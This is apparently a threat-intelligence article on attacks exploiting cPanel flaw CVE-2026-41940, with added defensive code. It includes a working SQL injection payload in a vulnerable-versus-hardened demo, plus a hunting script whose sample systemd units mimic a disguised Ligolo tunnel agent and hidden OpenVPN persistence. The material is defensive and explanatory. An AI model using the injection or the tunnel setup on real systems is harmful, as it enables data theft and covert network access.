A newly identified threat actor is actively exploiting a critical cPanel vulnerability, CVE-2026-41940, to target government and military organizations across Southeast Asia. The attacks, detected on May 2, 2026, also ensnare managed service providers (MSPs) and hosting providers in various global locations, indicating a broad opportunistic campaign by this emerging adversary.
The exploitation of CVE-2026-41940, a critical flaw that allows authentication bypass and elevated control over cPanel and WebHost Manager (WHM), relies on publicly available proof-of-concept exploits. Initial targeting has focused on government and military domains in the Philippines (*.mil.ph and *.ph) and Laos (*.gov.la), with attacks originating from the IP address 95.111.250[.]175.
Emerging Threat Actor Exploits cPanel Vulnerability
According to Ctrl-Alt-Intel, which reported the activity, the cPanel campaign is not this actor's only intrusion technique. Before turning to the cPanel vulnerability, the adversary used a distinct exploit chain against an Indonesian defense sector training portal: authenticated SQL injection combined with remote code execution, which implies the actor already held valid credentials for that target.
The Indonesian portal attack shows a bypass that relied on a server-side design flaw rather than on solving the challenge. The custom exploit script reportedly used hard-coded credentials and circumvented the portal's CAPTCHA by extracting the expected value from server-issued session cookies: the portal handed the answer to the client, so the script only had to echo it back. This let the actor proceed directly to the portal's document-management functions.
Once authenticated and past the CAPTCHA, the attacker targeted a vulnerable parameter within the document-saving function. The exploit script injected SQL into this field during the submission to the document-save endpoint. Because the request carried valid credentials, this was an authenticated (post-login) SQL injection, which means the server built a query from the submitted value without separating data from SQL syntax.
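The two flaws described above, a CAPTCHA whose expected answer is stored in a client cookie and a document-save handler that splices a request parameter into SQL, are shown below as an added illustration in Python. This is not the portal's code and nothing about the real portal is known beyond the article; the function names, the table layout, the `hash-of-secret` value and the `INJECTION` payload are all constructed for the example. Each vulnerable version sits next to a hardened one so the difference is visible in behaviour, not just in prose.

```python
"""Added illustration (not the portal's code): the two flaw classes the article
describes, each beside a hardened version. Names, table layout and the
'hash-of-secret' value are constructed for the example."""
import hmac
import secrets
import sqlite3

# ---- 1. CAPTCHA whose expected answer is handed to the client in a cookie ----

def issue_captcha_vulnerable():
    """Return (cookies, challenge_text). Flaw: the answer is stored in a client cookie."""
    answer = secrets.token_hex(3).upper()
    return {"captcha_expected": answer}, answer   # the challenge would be an image in practice

def check_captcha_vulnerable(cookies, submitted):
    return submitted == cookies.get("captcha_expected")

def attacker_solve(cookies):
    """The bypass the article describes: read the expected value back out of the cookie jar."""
    return cookies.get("captcha_expected", "")

_CHALLENGES = {}   # session id -> expected answer; this state never leaves the server

def issue_captcha_hardened():
    sid = secrets.token_urlsafe(16)
    answer = secrets.token_hex(3).upper()
    _CHALLENGES[sid] = answer
    return {"session": sid}, answer

def check_captcha_hardened(cookies, submitted):
    # pop() makes each challenge single-use, so a wrong answer cannot be retried
    expected = _CHALLENGES.pop(cookies.get("session", ""), None)
    return expected is not None and hmac.compare_digest(expected.encode(), submitted.encode())

# ---- 2. Document-save handler that splices a request parameter into SQL ----

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hash-of-secret')")
    db.execute("CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT, body TEXT, folder TEXT)")
    return db

def save_document_vulnerable(db, title, body, folder):
    # String formatting: a quote in any parameter rewrites the statement
    db.execute("INSERT INTO documents (title, body, folder) "
               f"VALUES ('{title}', '{body}', '{folder}')")

def save_document_hardened(db, title, body, folder):
    # Parameter binding: the driver sends values separately from the SQL text
    db.execute("INSERT INTO documents (title, body, folder) VALUES (?, ?, ?)",
               (title, body, folder))

def list_documents(db):
    return db.execute("SELECT title, body, folder FROM documents ORDER BY id").fetchall()

# Closes the folder literal, then adds a second row whose body is a subquery against users.
INJECTION = "x'), ('leak', (SELECT password_hash FROM users WHERE name='admin'), 'x"

def demo():
    results = {}
    cookies, _ = issue_captcha_vulnerable()
    results["captcha_bypassed"] = check_captcha_vulnerable(cookies, attacker_solve(cookies))
    cookies, _ = issue_captcha_hardened()
    results["captcha_blocked"] = not check_captcha_hardened(cookies, attacker_solve(cookies))

    db = fresh_db()
    save_document_vulnerable(db, "report", "hello", INJECTION)
    rows = list_documents(db)
    results["vuln_rows"] = len(rows)
    results["vuln_leaked"] = next(body for (title, body, _) in rows if title == "leak")

    db = fresh_db()
    save_document_hardened(db, "report", "hello", INJECTION)
    rows = list_documents(db)
    results["hardened_rows"] = len(rows)
    results["hardened_folder"] = rows[0][2]   # payload stored verbatim, nothing executed
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script shows the vulnerable CAPTCHA accepting an answer copied from the cookie and the hardened one rejecting it, and the vulnerable save storing a second row that contains the admin password hash while the hardened save stores the payload as an inert string. The fix for the CAPTCHA is keeping the expected answer in server-side session state; the fix for the save handler is parameter binding, with no amount of input filtering substituting for either.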
The threat actor uses the AdapdixC2 command-and-control (C2) framework to maintain remote access to compromised endpoints. Alongside it, OpenVPN and Ligolo, a tunneling and pivoting tool, provide persistent tunnels into victims' internal networks; both carry traffic over encrypted connections that are easy to mistake for legitimate VPN use, which helps the actor stay unnoticed while staging further operations.
Ctrl-Alt-Intel's analysis indicates that the threat actor established a robust access layer by combining OpenVPN, Ligolo and systemd units for persistence, so that the tunnels come back up whenever the host restarts or the process is killed. From that foothold the actor pivoted into internal networks and exfiltrated a significant volume of documents related to the Chinese railway sector.
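A defender hunting for the persistence layer described above would start with the systemd unit files. The script below is an added example, not part of Ctrl-Alt-Intel's report, that parses unit files and flags the patterns a tunneling implant tends to leave: an ExecStart binary in a world-writable or hidden directory, a Ligolo-style agent invocation (the ligolo-ng agent takes a `-connect host:port` argument), an OpenVPN client pointed at a config outside /etc/openvpn, and Restart= or a per-user unit keeping it alive. The four unit files, their paths and the address 203.0.113.10 are constructed samples (a documentation address, not an indicator from the article); the rule set is a starting point, not a complete detection.

```python
"""Added hunting script (not from the report): flag systemd units that look like
tunnel persistence. SAMPLE_UNITS are constructed; 203.0.113.10 is a documentation
address, not an indicator from the article."""
import os
import shlex

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def parse_unit(text):
    """Minimal unit parser -> {section: {key: [values]}}; keys such as ExecStart may repeat."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections

def assess_unit(path, text):
    """Return the reasons a unit is suspicious (empty list = nothing found)."""
    svc = parse_unit(text).get("Service", {})
    reasons = []
    for cmd in svc.get("ExecStartPre", []) + svc.get("ExecStart", []) + svc.get("ExecStartPost", []):
        argv = shlex.split(cmd.lstrip("@-:+!"))       # drop systemd exec-prefix characters
        if not argv:
            continue
        binary, name = argv[0], os.path.basename(argv[0]).lower()
        if binary.startswith(WRITABLE_DIRS) or "/." in binary:
            reasons.append(f"binary in world-writable or hidden path: {binary}")
        if "ligolo" in name or "-connect" in argv:   # ligolo-ng agent style: agent -connect host:port
            reasons.append(f"ligolo-style agent invocation: {cmd}")
        if "openvpn" in name:
            for cfg in (a for a in argv[1:] if a.endswith((".ovpn", ".conf"))):
                if not cfg.startswith("/etc/openvpn/"):
                    reasons.append(f"openvpn config outside /etc/openvpn: {cfg}")
    if reasons:   # supporting context, reported only when a primary reason exists
        if svc.get("Restart", ["no"])[0] in ("always", "on-failure"):
            reasons.append("Restart= keeps it alive across kills")
        if "/.config/systemd/user/" in path:
            reasons.append("per-user unit, installable without root")
    return reasons

def scan_units(units):
    """units: {path: file_text}. Returns only the flagged paths with their reasons."""
    findings = {}
    for path, text in units.items():
        reasons = assess_unit(path, text)
        if reasons:
            findings[path] = reasons
    return findings

def load_units(dirs=("/etc/systemd/system", os.path.expanduser("~/.config/systemd/user"))):
    """Read real .service files from the usual locations (skips directories that do not exist)."""
    units = {}
    for d in dirs:
        for name in (os.listdir(d) if os.path.isdir(d) else []):
            p = os.path.join(d, name)
            if name.endswith(".service") and os.path.isfile(p):
                with open(p, errors="replace") as fh:
                    units[p] = fh.read()
    return units

SAMPLE_UNITS = {   # constructed samples: two benign units, two that mimic tunnel persistence
    "/etc/systemd/system/ssh.service":
        "[Unit]\nDescription=OpenBSD Secure Shell server\n[Service]\n"
        "ExecStart=/usr/sbin/sshd -D\nRestart=on-failure\n[Install]\nWantedBy=multi-user.target\n",
    "/etc/systemd/system/openvpn-corp.service":
        "[Service]\nExecStart=/usr/sbin/openvpn --nobind --config /etc/openvpn/client/corp.conf\n"
        "Restart=always\n",
    "/etc/systemd/system/sys-update.service":
        "[Unit]\nDescription=System update helper\n[Service]\n"
        "ExecStart=/dev/shm/.x/agent -connect 203.0.113.10:11601 -ignore-cert\n"
        "Restart=always\nRestartSec=30\n[Install]\nWantedBy=multi-user.target\n",
    "/home/www/.config/systemd/user/cache.service":
        "[Service]\nExecStart=/usr/sbin/openvpn --config /home/www/.cache/c.ovpn --daemon\n"
        "Restart=always\n[Install]\nWantedBy=default.target\n",
}

if __name__ == "__main__":
    import sys
    units = SAMPLE_UNITS if "--sample" in sys.argv else load_units()
    for path, reasons in scan_units(units).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Run with `--sample` to see the constructed cases; without it the script reads the live unit directories. The two benign samples (sshd, and OpenVPN with a config under /etc/openvpn) produce nothing, while the fake updater in /dev/shm and the per-user OpenVPN unit pointed at a hidden config are both reported, each with Restart= noted as the persistence mechanism.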
Broader Exploitation of CVE-2026-41940
The emergence of this new threat actor exploiting CVE-2026-41940 is occurring alongside broader weaponization of the vulnerability. Censys has reported that multiple third-party actors began exploiting the cPanel flaw within 24 hours of its public disclosure. These other actors have deployed Mirai botnet variants and a ransomware strain known as Sorry, highlighting the widespread impact of this critical vulnerability.
Data from the Shadowserver Foundation provides further insight into the scale of scanning activity. On April 30, 2026, approximately 44,000 IP addresses, likely compromised via CVE-2026-41940, were observed engaging in scanning and brute-force attacks against honeypots. While this number has since decreased to 3,540 as of May 3, it underscores the rapid adoption of the vulnerability by various malicious actors.
The identity and motivations behind this specific threat actor remain unknown. However, the coordinated exploitation of the cPanel vulnerability by multiple entities signals a significant, ongoing threat to organizations relying on cPanel for web hosting and management. The continued use of sophisticated techniques, including custom exploits and robust C2 frameworks, suggests a well-resourced and determined adversary.
Organizations running cPanel and WHM should apply the latest security patches immediately to close CVE-2026-41940, and, where possible, restrict access to the cPanel and WHM login interfaces to trusted networks. Continuous monitoring of network traffic for anomalous activity and multi-factor authentication remain important defenses, with one caveat: MFA hardens the login path but does not stop an authentication bypass, so it complements patching rather than replacing it. The cybersecurity community will be watching for further activity from this emerging threat actor and any potential attribution.